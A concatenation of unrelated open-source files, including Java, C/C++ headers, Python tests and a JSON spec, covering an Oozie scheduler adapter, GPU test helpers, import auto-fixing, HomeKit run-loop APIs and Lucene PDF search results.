this.sourceNodeModifiedIdList.add(sourceNodeModifiedId);
}
public Optional<Spiller> getSpiller()
{
return spiller;
}
public void setSpiller(Optional<Spiller> spiller)
{
this.spiller = spiller;
}
public int getPagesWrittenCount()
{
return pagesWritten;
}
public void setPagesWritten(int pagesWritten)
{
this.pagesWritten = pagesWritten;
}
public int getCurConsumerScanNodeRefCount()
{
return this.curConsumerScanNodeRefCount;
}
public void setCurConsumerScanNodeRefCount(int curConsumerScanNodeRefCount)
{
this.curConsumerScanNodeRefCount = curConsumerScanNodeRefCount;
}
public int getTotalConsumerScanNodeCount()
{
return totalConsumerScanNodeCount;
}
public void setTotalConsumerScanNodeCount(int totalConsumerScanNodeCount)
{
this.totalConsumerScanNodeCount = totalConsumerScanNodeCount;
}
public OperatorContext getOperatorContext()
{
return operatorContext;
}
public void setOperatorContext(OperatorContext operatorContext)
{
this.operatorContext = operatorContext;
}
public void addPage(Page page)
{
if (this.pageCaches != null) {
this.pageCaches.add(page);
}
}
public void clearPagesToSpill()
{
this.pagesToSpill.clear();
}
}
| 1,874 |
2,757 | <reponame>CEOALT1/RefindPlusUDK
/** @file
Constants and declarations for the Echo function.
Copyright (c) 2012 - 2014, Intel Corporation. All rights reserved.<BR>
This program and the accompanying materials are licensed and made available
under the terms and conditions of the BSD License which accompanies this
distribution. The full text of the license may be found at
http://opensource.org/licenses/bsd-license.php.
THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
**/
#ifndef _IIO_ECHO_CTRL_H
#define _IIO_ECHO_CTRL_H
#include <sys/termios.h>
__BEGIN_DECLS
/* These constants are assigned values within the Unicode Private Use range.
The value of IIO_ECHO_MIN must be adjusted to ensure that IIO_ECHO_MAX
never exceeds the value of (TtyFunKeyMin - 1).
*/
typedef enum {
IIO_ECHO_MIN = (TtySpecKeyMin),
IIO_ECHO_DISCARD = IIO_ECHO_MIN, // Ignore this character completely
IIO_ECHO_ERASE, // Erase previous character
IIO_ECHO_KILL, // Kill the entire line
IIO_ECHO_MAX
} IioEchoCtrl;
__END_DECLS
#endif /* _IIO_ECHO_CTRL_H */
| 490 |
11,868 | from copy import deepcopy
import unittest
from petstore_api.model.mammal import Mammal
from petstore_api.model.triangle import Triangle
class TestCopy(unittest.TestCase):
"""TestCopy unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDeepCopyOneOf(self):
"""test deepcopy"""
obj = deepcopy(Mammal(class_name="whale"))
assert id(deepcopy(obj)) != id(obj)
assert deepcopy(obj) == obj
def testDeepCopyAllOf(self):
"""test deepcopy"""
obj = Triangle(shape_type="Triangle", triangle_type="EquilateralTriangle", foo="blah")
assert id(deepcopy(obj)) != id(obj)
assert deepcopy(obj) == obj
obj = Triangle._new_from_openapi_data(shape_type="Triangle", triangle_type="EquilateralTriangle", foo="blah")
assert id(deepcopy(obj)) != id(obj)
assert deepcopy(obj) == obj
if __name__ == '__main__':
unittest.main()
| 386 |
1,318 | /*
* Copyright 2016 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.linkedin.drelephant.schedulers;
import com.linkedin.drelephant.configurations.scheduler.SchedulerConfigurationData;
import com.linkedin.drelephant.util.Utils;
import org.apache.log4j.Logger;
import org.apache.oozie.client.*;
import org.apache.commons.lang.StringUtils;
import java.util.Properties;
/**
* This class provides methods to load information specific to the Oozie scheduler.
*/
public class OozieScheduler implements Scheduler {
private static final Logger logger = Logger.getLogger(OozieScheduler.class);
private static final String OOZIE_ACTION_ID = "oozie.action.id";
private static final String OOZIE_API_URL = "oozie_api_url";
private static final String OOZIE_AUTH_OPTION = "oozie_auth_option";
private static final String OOZIE_JOB_DEF_URL_TEMPLATE = "oozie_job_url_template";
private static final String OOZIE_JOB_EXEC_URL_TEMPLATE = "oozie_job_exec_url_template";
private static final String OOZIE_WORKFLOW_DEF_URL_TEMPLATE = "oozie_workflow_url_template";
private static final String OOZIE_WORKFLOW_EXEC_URL_TEMPLATE = "oozie_workflow_exec_url_template";
private static final String OOZIE_APP_NAME_UNIQUENESS = "oozie_app_name_uniqueness";
private boolean appNameUniqueness;
private String schedulerName;
private String jobDefId;
private String jobExecId;
private String flowExecId;
private String flowDefId;
private String jobDefIdUrl;
private String jobExecIdUrl;
private String flowExecIdUrl;
private String flowDefIdUrl;
private int workflowDepth;
private OozieClient oozieClient;
private String jobDefUrlTemplate;
private String jobExecUrlTemplate;
private String workflowDefUrlTemplate;
private String workflowExecUrlTemplate;
private String flowDefName;
public OozieScheduler(String appId, Properties properties, SchedulerConfigurationData schedulerConfData) {
this(appId, properties, schedulerConfData, null);
}
public OozieScheduler(String appId, Properties properties, SchedulerConfigurationData schedulerConfData, OozieClient oozieClient) {
schedulerName = schedulerConfData.getSchedulerName();
if (properties != null && properties.getProperty(OOZIE_ACTION_ID) != null) {
this.oozieClient = oozieClient == null ? makeOozieClient(schedulerConfData) : oozieClient;
jobDefUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_JOB_DEF_URL_TEMPLATE);
jobExecUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_JOB_EXEC_URL_TEMPLATE);
workflowDefUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_WORKFLOW_DEF_URL_TEMPLATE);
workflowExecUrlTemplate = schedulerConfData.getParamMap().get(OOZIE_WORKFLOW_EXEC_URL_TEMPLATE);
String appNameUniquenessStr = schedulerConfData.getParamMap().get(OOZIE_APP_NAME_UNIQUENESS);
appNameUniqueness = appNameUniquenessStr != null && Boolean.parseBoolean(appNameUniquenessStr);
loadInfo(properties);
}
// Use default value of data type
}
private void loadInfo(Properties properties) {
// 0004167-160629080632562-oozie-oozi-W@some-action
String actionId = properties.getProperty(OOZIE_ACTION_ID);
if (actionId.contains("@")) {
String workflowId = extractId(actionId);
WorkflowJob workflow;
try {
logger.info("Fetching Oozie workflow info for " + workflowId);
workflow = oozieClient.getJobInfo(workflowId);
logger.info("Oozie workflow for " + workflowId + ": " + workflow);
String superParentId = getSuperParentId(workflow);
logger.info("Oozie super parent for: " + workflowId + ": " + superParentId);
jobExecId = workflow.getId();
jobExecIdUrl = workflow.getConsoleUrl();
jobDefIdUrl = workflow.getConsoleUrl();
flowExecId = superParentId;
if (isCoordinatorJob(superParentId)) {
coordinatedJobInfo(workflow, actionId, superParentId);
} else {
manualCommittedJob(workflow, actionId, superParentId);
}
} catch (OozieClientException e) {
throw new RuntimeException("Failed fetching Oozie workflow " + workflowId + " info", e);
}
}
}
private void manualCommittedJob(WorkflowJob workflow, String actionId, String superParentId) throws OozieClientException {
logger.info("Oozie workflow " + actionId + " was manually submitted");
WorkflowJob flowDefWorkflow = oozieClient.getJobInfo(extractId(superParentId));
flowDefIdUrl = flowDefWorkflow.getConsoleUrl();
flowExecIdUrl = flowDefWorkflow.getConsoleUrl();
if (appNameUniqueness) {
jobDefId = workflow.getAppName() + "-" + extractAction(actionId);
flowDefId = superParentId;
flowDefName = flowDefWorkflow.getAppName();
} else {
jobDefId = workflow.getId();
flowDefId = superParentId;
}
}
private void coordinatedJobInfo(WorkflowJob workflow, String actionId, String superParentId) throws OozieClientException {
logger.info("Oozie workflow " + actionId + " is scheduled with coordinator");
CoordinatorJob flowDefCoordinator = oozieClient.getCoordJobInfo(extractId(superParentId));
flowDefIdUrl = flowDefCoordinator.getConsoleUrl();
flowExecIdUrl = flowDefCoordinator.getConsoleUrl();
if (appNameUniqueness) {
jobDefId = workflow.getAppName() + "-" + extractAction(actionId);
flowDefId = extractId(superParentId);
flowDefName = flowDefCoordinator.getAppName();
} else {
jobDefId = extractId(superParentId) + "-" + extractAction(actionId) + "-" + workflowDepth;
flowDefId = extractId(superParentId);
}
}
private String extractId(String idAndAction) {
return idAndAction.split("@")[0];
}
private String extractAction(String idAndAction) {
return idAndAction.split("@")[1];
}
private String getSuperParentId(WorkflowJob workflow) throws OozieClientException {
WorkflowJob current = workflow;
workflowDepth = 0;
while (hasParent(current)) {
if (isCoordinatorJob(current.getParentId())) {
return current.getParentId();
}
current = oozieClient.getJobInfo(current.getParentId());
workflowDepth++;
}
return current.getId();
}
private boolean hasParent(WorkflowJob workflow) {
return StringUtils.isNotEmpty(workflow.getParentId());
}
private boolean isCoordinatorJob(String workflowId) {
return workflowId != null && extractId(workflowId).endsWith("C");
}
private OozieClient makeOozieClient(SchedulerConfigurationData schedulerConfData) {
String oozieApiUrl = schedulerConfData.getParamMap().get(OOZIE_API_URL);
String authOption = schedulerConfData.getParamMap().get(OOZIE_AUTH_OPTION);
if (oozieApiUrl == null) {
throw new RuntimeException("Missing " + OOZIE_API_URL + " param for Oozie Scheduler");
}
return new AuthOozieClient(oozieApiUrl, authOption);
}
private String getUrl(String idUrl, String id, String urlTemplate, String propertyName) {
String url;
if (urlTemplate != null) {
url = Utils.formatStringOrNull(urlTemplate, id);
} else if (idUrl != null) {
url = idUrl;
} else {
logger.warn("Missing " + propertyName + " param for Oozie Scheduler");
url = id;
}
return url;
}
@Override
public String getSchedulerName() {
return schedulerName;
}
@Override
public boolean isEmpty() {
return schedulerName == null || jobDefId == null || jobExecId == null || flowDefId == null || flowExecId == null;
}
@Override
public String getJobDefId() {
return Utils.formatStringOrNull("%s", jobDefId);
}
@Override
public String getJobExecId() {
return Utils.formatStringOrNull("%s", jobExecId);
}
@Override
public String getFlowDefId() {
return Utils.formatStringOrNull("%s", appNameUniqueness ? flowDefName : flowDefId);
}
@Override
public String getFlowExecId() {
return Utils.formatStringOrNull("%s", flowExecId);
}
@Override
public String getJobDefUrl() {
return getUrl(jobDefIdUrl, jobDefId, jobDefUrlTemplate, OOZIE_JOB_DEF_URL_TEMPLATE);
}
@Override
public String getJobExecUrl() {
return getUrl(jobExecIdUrl, jobExecId, jobExecUrlTemplate, OOZIE_JOB_EXEC_URL_TEMPLATE);
}
@Override
public String getFlowDefUrl() {
return getUrl(flowDefIdUrl, flowDefId, workflowDefUrlTemplate, OOZIE_WORKFLOW_DEF_URL_TEMPLATE);
}
@Override
public String getFlowExecUrl() {
return getUrl(flowExecIdUrl, flowExecId, workflowExecUrlTemplate, OOZIE_WORKFLOW_EXEC_URL_TEMPLATE);
}
@Override
public int getWorkflowDepth() {
return workflowDepth;
}
@Override
public String getJobName() {
return jobDefId;
}
}
| 3,906 |
777 | // Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef GPU_COMMAND_BUFFER_SERVICE_TEST_HELPER_H_
#define GPU_COMMAND_BUFFER_SERVICE_TEST_HELPER_H_
#include <stddef.h>
#include <string>
#include <vector>
#include "gpu/command_buffer/common/gles2_cmd_utils.h"
#include "gpu/command_buffer/service/shader_translator.h"
#include "ui/gl/gl_implementation.h"
#include "ui/gl/gl_mock.h"
namespace gpu {
namespace gles2 {
struct DisallowedFeatures;
class Buffer;
class BufferManager;
class FeatureInfo;
class MockErrorState;
class Shader;
class TextureRef;
class TextureManager;
class TestHelper {
public:
static const GLuint kServiceBlackTexture2dId = 701;
static const GLuint kServiceDefaultTexture2dId = 702;
static const GLuint kServiceBlackTexture3dId = 703;
static const GLuint kServiceDefaultTexture3dId = 704;
static const GLuint kServiceBlackTexture2dArrayId = 705;
static const GLuint kServiceDefaultTexture2dArrayId = 706;
static const GLuint kServiceBlackTextureCubemapId = 707;
static const GLuint kServiceDefaultTextureCubemapId = 708;
static const GLuint kServiceBlackExternalTextureId = 709;
static const GLuint kServiceDefaultExternalTextureId = 710;
static const GLuint kServiceBlackRectangleTextureId = 711;
static const GLuint kServiceDefaultRectangleTextureId = 712;
static const GLint kMaxSamples = 4;
static const GLint kMaxRenderbufferSize = 1024;
static const GLint kMaxTextureSize = 2048;
static const GLint kMaxCubeMapTextureSize = 2048;
static const GLint kMax3DTextureSize = 1024;
static const GLint kMaxArrayTextureLayers = 256;
static const GLint kMaxRectangleTextureSize = 64;
static const GLint kNumVertexAttribs = 16;
static const GLint kNumTextureUnits = 8;
static const GLint kMaxTextureImageUnits = 8;
static const GLint kMaxVertexTextureImageUnits = 2;
static const GLint kMaxFragmentUniformVectors = 16;
static const GLint kMaxFragmentUniformComponents =
kMaxFragmentUniformVectors * 4;
static const GLint kMaxVaryingVectors = 8;
static const GLint kMaxVaryingFloats = kMaxVaryingVectors * 4;
static const GLint kMaxVertexUniformVectors = 128;
static const GLint kMaxVertexUniformComponents = kMaxVertexUniformVectors * 4;
static const GLint kMaxVertexOutputComponents = 64;
static const GLint kMaxFragmentInputComponents = 60;
static const GLint kMaxProgramTexelOffset = 7;
static const GLint kMinProgramTexelOffset = -8;
static const GLint kMaxTransformFeedbackSeparateAttribs = 4;
static const GLint kMaxUniformBufferBindings = 24;
static const GLint kUniformBufferOffsetAlignment = 1;
struct AttribInfo {
const char* name;
GLint size;
GLenum type;
GLint location;
};
struct UniformInfo {
const char* name;
GLint size;
GLenum type;
GLint fake_location;
GLint real_location;
GLint desired_location;
const char* good_name;
};
struct VaryingInfo {
const char* name;
GLint size;
GLenum type;
GLint fake_location;
GLint real_location;
GLint desired_location;
};
struct ProgramOutputInfo {
const char* name;
GLint size;
GLenum type;
GLint color_name;
GLuint index;
};
static void SetupContextGroupInitExpectations(
::gl::MockGLInterface* gl,
const DisallowedFeatures& disallowed_features,
const char* extensions,
const char* gl_version,
ContextType context_type,
bool bind_generates_resource);
static void SetupFeatureInfoInitExpectations(::gl::MockGLInterface* gl,
const char* extensions);
static void SetupFeatureInfoInitExpectationsWithGLVersion(
::gl::MockGLInterface* gl,
const char* extensions,
const char* gl_renderer,
const char* gl_version,
ContextType context_type);
static void SetupTextureManagerInitExpectations(::gl::MockGLInterface* gl,
bool is_es3_enabled,
bool is_es3_capable,
bool is_desktop_core_profile,
const char* extensions,
bool use_default_textures);
static void SetupTextureManagerDestructionExpectations(
::gl::MockGLInterface* gl,
bool is_es3_enabled,
bool is_desktop_core_profile,
const char* extensions,
bool use_default_textures);
static void SetupExpectationsForClearingUniforms(::gl::MockGLInterface* gl,
UniformInfo* uniforms,
size_t num_uniforms);
static void SetupShaderExpectations(::gl::MockGLInterface* gl,
const FeatureInfo* feature_info,
AttribInfo* attribs,
size_t num_attribs,
UniformInfo* uniforms,
size_t num_uniforms,
GLuint service_id);
static void SetupShaderExpectationsWithVaryings(
::gl::MockGLInterface* gl,
const FeatureInfo* feature_info,
AttribInfo* attribs,
size_t num_attribs,
UniformInfo* uniforms,
size_t num_uniforms,
VaryingInfo* varyings,
size_t num_varyings,
ProgramOutputInfo* program_outputs,
size_t num_program_outputs,
GLuint service_id);
static void SetupProgramSuccessExpectations(
::gl::MockGLInterface* gl,
const FeatureInfo* feature_info,
AttribInfo* attribs,
size_t num_attribs,
UniformInfo* uniforms,
size_t num_uniforms,
VaryingInfo* varyings,
size_t num_varyings,
ProgramOutputInfo* program_outputs,
size_t num_program_outputs,
GLuint service_id);
static void DoBufferData(::gl::MockGLInterface* gl,
MockErrorState* error_state,
BufferManager* manager,
Buffer* buffer,
GLenum target,
GLsizeiptr size,
GLenum usage,
const GLvoid* data,
GLenum error);
static void SetTexParameteriWithExpectations(::gl::MockGLInterface* gl,
MockErrorState* error_state,
TextureManager* manager,
TextureRef* texture_ref,
GLenum pname,
GLint value,
GLenum error);
static void SetShaderStates(
::gl::MockGLInterface* gl,
Shader* shader,
bool expected_valid,
const std::string* const expected_log_info,
const std::string* const expected_translated_source,
const int* const expected_shader_version,
const AttributeMap* const expected_attrib_map,
const UniformMap* const expected_uniform_map,
const VaryingMap* const expected_varying_map,
const InterfaceBlockMap* const expected_interface_block_map,
const OutputVariableList* const expected_output_variable_list,
const NameMap* const expected_name_map);
static void SetShaderStates(::gl::MockGLInterface* gl,
Shader* shader,
bool valid);
static sh::Attribute ConstructAttribute(
GLenum type, GLint array_size, GLenum precision,
bool static_use, const std::string& name);
static sh::Uniform ConstructUniform(
GLenum type, GLint array_size, GLenum precision,
bool static_use, const std::string& name);
static sh::Varying ConstructVarying(
GLenum type, GLint array_size, GLenum precision,
bool static_use, const std::string& name);
static sh::OutputVariable ConstructOutputVariable(GLenum type,
GLint array_size,
GLenum precision,
bool static_use,
const std::string& name);
private:
static void SetupTextureInitializationExpectations(::gl::MockGLInterface* gl,
GLenum target,
bool use_default_textures);
static void SetupTextureDestructionExpectations(::gl::MockGLInterface* gl,
GLenum target,
bool use_default_textures);
static std::vector<std::string> split_extensions_;
};
} // namespace gles2
} // namespace gpu
#endif // GPU_COMMAND_BUFFER_SERVICE_TEST_HELPER_H_
| 4,177 |
3,182 | <reponame>1337c0der/lombok-intellij-plugin
import lombok.extern.java.Log;
@Log
public class LogTest {
public void logSomething(){
log.info("Hello World!");
}
public static void main(String[] args) {
new LogTest().logSomething();
}
}
| 110 |
2,443 | // Copyright (c) 2015-2019 The HomeKit ADK Contributors
//
// Licensed under the Apache License, Version 2.0 (the “License”);
// you may not use this file except in compliance with the License.
// See [CONTRIBUTORS.md] for the list of HomeKit ADK project authors.
#ifndef HAP_PLATFORM_RUN_LOOP_H
#define HAP_PLATFORM_RUN_LOOP_H
#ifdef __cplusplus
extern "C" {
#endif
#include "HAPPlatform.h"
#if __has_feature(nullability)
#pragma clang assume_nonnull begin
#endif
/**
* Runs the loop which processes data from all attached input sources.
*
* - This function may only be called while the run loop is stopped.
*/
void HAPPlatformRunLoopRun(void);
/**
* Schedules a request to exit the run loop.
*
* - This function must be called from the same execution context (e.g., thread) as the run loop,
* i.e. it should be scheduled on the run loop.
*
* - When this function returns, the run loop is not yet fully stopped.
* Wait for HAPPlatformRunLoopRun to return.
*
* - The execution of pending scheduled events may be delayed until the run loop is started again.
*/
void HAPPlatformRunLoopStop(void);
/**
* Callback that is invoked from the run loop.
*
* @param context Client context.
* @param contextSize Size of the context.
*/
typedef void (*HAPPlatformRunLoopCallback)(void* _Nullable context, size_t contextSize);
/**
* Schedule a callback that will be called from the run loop.
*
* - It is safe to call this function from execution contexts (e.g., threads) other than the run loop,
* e.g., from another thread or from a signal handler.
*
* @param callback Function to call on the run loop.
* @param context Context that is passed to the callback.
* @param contextSize Size of context data that is passed to the callback.
*
* @return kHAPError_None If successful.
* @return kHAPError_OutOfResources If there are not enough resources to schedule the callback.
*/
HAP_RESULT_USE_CHECK
HAPError HAPPlatformRunLoopScheduleCallback(
HAPPlatformRunLoopCallback callback,
void* _Nullable context,
size_t contextSize);
#if __has_feature(nullability)
#pragma clang assume_nonnull end
#endif
#ifdef __cplusplus
}
#endif
#endif
| 761 |
311 | package org.javacs.rewrite;
import com.sun.source.util.Trees;
import java.io.IOException;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.logging.Logger;
import org.javacs.CompileTask;
import org.javacs.CompilerProvider;
import org.javacs.lsp.Position;
import org.javacs.lsp.Range;
import org.javacs.lsp.TextEdit;
public class AutoFixImports implements Rewrite {
final Path file;
public AutoFixImports(Path file) {
this.file = file;
}
@Override
public Map<Path, TextEdit[]> rewrite(CompilerProvider compiler) {
LOG.info("Fix imports in " + file + "...");
try (var task = compiler.compile(file)) {
var used = usedImports(task);
var unresolved = unresolvedNames(task);
var resolved = resolveNames(compiler, unresolved);
var all = new ArrayList<String>();
all.addAll(used);
all.addAll(resolved.values());
all.sort(String::compareTo); // TODO this is not always a good order
var edits = new ArrayList<TextEdit>();
edits.addAll(deleteImports(task));
edits.add(insertImports(task, all));
return Map.of(file, edits.toArray(new TextEdit[edits.size()]));
}
}
private Set<String> usedImports(CompileTask task) {
var used = new HashSet<String>();
new FindUsedImports(task.task).scan(task.root(), used);
return used;
}
private Set<String> unresolvedNames(CompileTask task) {
var names = new HashSet<String>();
for (var d : task.diagnostics) {
if (!d.getCode().equals("compiler.err.cant.resolve.location")) continue;
if (!d.getSource().toUri().equals(file.toUri())) continue;
var start = (int) d.getStartPosition();
var end = (int) d.getEndPosition();
CharSequence contents;
try {
contents = d.getSource().getCharContent(true);
} catch (IOException e) {
throw new RuntimeException(e);
}
var name = contents.subSequence(start, end).toString();
if (!name.matches("[A-Z]\\w+")) continue;
names.add(name);
}
return names;
}
private Map<String, String> resolveNames(CompilerProvider compiler, Set<String> unresolved) {
var resolved = new HashMap<String, String>();
var alreadyImported = compiler.imports();
for (var className : unresolved) {
var candidates = new ArrayList<String>();
for (var i : alreadyImported) {
if (i.endsWith("." + className)) {
candidates.add(i);
}
}
if (candidates.isEmpty()) continue;
if (candidates.size() > 1) {
LOG.warning("..." + className + " is ambiguous between " + String.join(", ", candidates));
continue;
}
LOG.info("...resolve " + className + " to " + candidates.get(0));
resolved.put(className, candidates.get(0));
}
// TODO import my own classes
return resolved;
}
private List<TextEdit> deleteImports(CompileTask task) {
var edits = new ArrayList<TextEdit>();
var pos = Trees.instance(task.task).getSourcePositions();
var root = task.root();
for (var i : root.getImports()) {
if (i.isStatic()) continue;
var start = pos.getStartPosition(root, i);
var line = (int) root.getLineMap().getLineNumber(start);
var delete = new TextEdit(new Range(new Position(line - 1, 0), new Position(line, 0)), "");
edits.add(delete);
}
return edits;
}
private TextEdit insertImports(CompileTask task, List<String> qualifiedNames) {
var pos = insertPosition(task);
var text = new StringBuilder();
for (var i : qualifiedNames) {
text.append("import ").append(i).append(";\n");
}
return new TextEdit(new Range(pos, pos), text.toString());
}
private Position insertPosition(CompileTask task) {
var pos = Trees.instance(task.task).getSourcePositions();
var root = task.root();
// If there are imports, use the start of the first import as the insert position
for (var i : root.getImports()) {
if (!i.isStatic()) {
var start = pos.getStartPosition(root, i);
var line = (int) root.getLineMap().getLineNumber(start);
return new Position(line - 1, 0);
}
}
// If there are no imports, insert after the package declaration
if (root.getPackage() != null) {
var end = pos.getEndPosition(root, root.getPackage());
var line = (int) root.getLineMap().getLineNumber(end) + 1;
return new Position(line - 1, 0);
}
// If there are no imports and no package, insert at the top of the file
return new Position(0, 0);
}
private static final Logger LOG = Logger.getLogger("main");
}
| 2,294 |
853 | <filename>crypto/uint32_pack.c
#include "uint32_pack.h"
/*
The 'uint32_pack' function converts 32-bit unsigned
integer into 4 bytes stored in little-endian format
*/
void uint32_pack(unsigned char *y, crypto_uint32 x) {
long long i;
for (i = 0; i < 4; ++i) { y[i] = x; x >>= 8; }
}
| 115 |
5,169 | {
"name": "JsWebRtc",
"version": "0.0.1",
"summary": "WebRTC.framework",
"description": "WebRTC.framework just for jsrtc-ios-sdk",
"homepage": "https://gitee.com/GikkiAres/js-web-rtc",
"license": "MIT",
"authors": {
"<NAME>": "<EMAIL>"
},
"platforms": {
"ios": "9.0"
},
"source": {
"git": "https://gitee.com/GikkiAres/js-web-rtc.git",
"tag": "0.0.1"
},
"vendored_frameworks": "WebRTC.framework",
"frameworks": [
"UIKit",
"Foundation"
],
"xcconfig": {
"VALID_ARCHS": "arm64",
"skip_validation": true
},
"user_target_xcconfig": {
"EXCLUDED_ARCHS[sdk=iphonesimulator*]": "arm64"
}
}
| 317 |
1,130 | /*
Copyright (c) 2014, <NAME>
2-clause BSD license.
*/
#include <string.h>
int strcoll(char* s1, char* s2)
{
return strcmp(s1, s2);
}
| 65 |
809 | <gh_stars>100-1000
/**
* @file traps_core.h
* @brief
* @author <NAME> <<EMAIL>>
* @version 0.1
* @date 2015-08-17
*/
#ifndef ASM_HAL_ENV_TRAPS_CORE_H_
#define ASM_HAL_ENV_TRAPS_CORE_H_
#include <stdint.h>
/** Defines handler for traps_dispatcher in Aarch64 archecture */
typedef int (*__trap_handler)(uint32_t nr, void *data);
/** Defines traps environment for Aarch64 structure */
typedef struct __traps_env {
} __traps_env_t;
#endif /* ASM_HAL_ENV_TRAPS_CORE_H_ */
| 205 |
6,224 | <filename>tests/subsys/logging/log_benchmark/src/test_helpers.h<gh_stars>1000+
/*
* Copyright (c) 2021 Nordic Semiconductor ASA
*
* SPDX-License-Identifier: Apache-2.0
*/
#ifndef SRC_TEST_HELPERS_H__
#define SRC_TEST_HELPERS_H__
#include <zephyr.h>
__syscall void test_helpers_log_setup(void);
__syscall int test_helpers_cycle_get(void);
__syscall bool test_helpers_log_dropped_pending(void);
#include <syscalls/test_helpers.h>
#endif /* SRC_TEST_HELPERS_H__ */
| 198 |
2,813 | package org.jabref.model.pdf.search;
import java.io.IOException;
import java.util.Arrays;
import java.util.List;
import java.util.stream.Collectors;
import org.jabref.model.entry.BibEntry;
import org.apache.lucene.analysis.TokenStream;
import org.apache.lucene.index.IndexableField;
import org.apache.lucene.search.IndexSearcher;
import org.apache.lucene.search.Query;
import org.apache.lucene.search.ScoreDoc;
import org.apache.lucene.search.highlight.Highlighter;
import org.apache.lucene.search.highlight.InvalidTokenOffsetsException;
import org.apache.lucene.search.highlight.QueryScorer;
import org.apache.lucene.search.highlight.SimpleHTMLFormatter;
import org.apache.lucene.search.highlight.TextFragment;
import static org.jabref.model.pdf.search.SearchFieldConstants.ANNOTATIONS;
import static org.jabref.model.pdf.search.SearchFieldConstants.CONTENT;
import static org.jabref.model.pdf.search.SearchFieldConstants.MODIFIED;
import static org.jabref.model.pdf.search.SearchFieldConstants.PAGE_NUMBER;
import static org.jabref.model.pdf.search.SearchFieldConstants.PATH;
public final class SearchResult {
private final String path;
private final int pageNumber;
private final long modified;
private final float luceneScore;
private List<String> contentResultStringsHtml;
private List<String> annotationsResultStringsHtml;
public SearchResult(IndexSearcher searcher, Query query, ScoreDoc scoreDoc) throws IOException {
this.path = getFieldContents(searcher, scoreDoc, PATH);
this.pageNumber = Integer.parseInt(getFieldContents(searcher, scoreDoc, PAGE_NUMBER));
this.modified = Long.parseLong(getFieldContents(searcher, scoreDoc, MODIFIED));
this.luceneScore = scoreDoc.score;
String content = getFieldContents(searcher, scoreDoc, CONTENT);
String annotations = getFieldContents(searcher, scoreDoc, ANNOTATIONS);
Highlighter highlighter = new Highlighter(new SimpleHTMLFormatter("<b>", "</b>"), new QueryScorer(query));
try (TokenStream contentStream = new EnglishStemAnalyzer().tokenStream(CONTENT, content)) {
TextFragment[] frags = highlighter.getBestTextFragments(contentStream, content, true, 10);
this.contentResultStringsHtml = Arrays.stream(frags).map(TextFragment::toString).collect(Collectors.toList());
} catch (InvalidTokenOffsetsException e) {
this.contentResultStringsHtml = List.of();
}
try (TokenStream annotationStream = new EnglishStemAnalyzer().tokenStream(ANNOTATIONS, annotations)) {
TextFragment[] frags = highlighter.getBestTextFragments(annotationStream, annotations, true, 10);
this.annotationsResultStringsHtml = Arrays.stream(frags).map(TextFragment::toString).collect(Collectors.toList());
} catch (InvalidTokenOffsetsException e) {
this.annotationsResultStringsHtml = List.of();
}
}
private String getFieldContents(IndexSearcher searcher, ScoreDoc scoreDoc, String field) throws IOException {
IndexableField indexableField = searcher.doc(scoreDoc.doc).getField(field);
if (indexableField == null) {
return "";
}
return indexableField.stringValue();
}
public boolean isResultFor(BibEntry entry) {
return entry.getFiles().stream().anyMatch(linkedFile -> path.equals(linkedFile.getLink()));
}
public String getPath() {
return path;
}
public long getModified() {
return modified;
}
public float getLuceneScore() {
return luceneScore;
}
public List<String> getContentResultStringsHtml() {
return contentResultStringsHtml;
}
public List<String> getAnnotationsResultStringsHtml() {
return annotationsResultStringsHtml;
}
public int getPageNumber() {
return pageNumber;
}
}
| 1,376 |
591 | /*
* ========================= AI_Crab.h ==========================
* -- tpr --
* CREATE -- 2019.05.09
* MODIFY --
* ----------------------------------------------------------
* 螃蟹式 AI
* -----------------------
*/
#ifndef TPR_AI_CRAB_H
#define TPR_AI_CRAB_H
#include "pch.h"
//-------------------- Engine --------------------//
#include "GameObj.h"
#include "functorTypes.h"
class AI_Crab{
public:
AI_Crab() = default;
inline void init( )noexcept{
//this->goid = goid_;
}
//void logicUpdate();
inline void bind_get_tmpVal_functor( const F_R_int &functor_ )noexcept{
this->get_tmpVal_functor = functor_;
}
private:
//GameObj *goPtr {nullptr};
//std::weak_ptr<GameObj> goWPtr {};
//goid_t goid {};
//-- tmp
F_1 get_tmpVal_functor {nullptr};
//int tmpCount {0}; 未被使用...
};
#endif
| 481 |
1,538 | // Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
#pragma once
#include <functional>
#include <vector>
#include "kudu/gutil/ref_counted.h"
#include "kudu/util/memory/arena.h"
namespace kudu {
class RowBlockRefCounted;
// Handles the memory allocated alongside a RowBlock for variable-length
// cells.
//
// When scanning rows into a RowBlock, the rows may contain variable-length
// data (eg BINARY columns). In this case, the data cannot be inlined directly
// into the columnar data arrays that are part of the RowBlock and instead need
// to be allocated out of a separate Arena. This class wraps that Arena.
//
// In some cases (eg "plain" or "dictionary" encodings), the underlying blocks may contain
// string data in a non-encoded form. In that case, instead of copying strings, we can
// refer to the strings within those data blocks themselves, and hold a reference to
// the underlying block. This class holds those reference counts as well.
struct RowBlockMemory {
Arena arena;
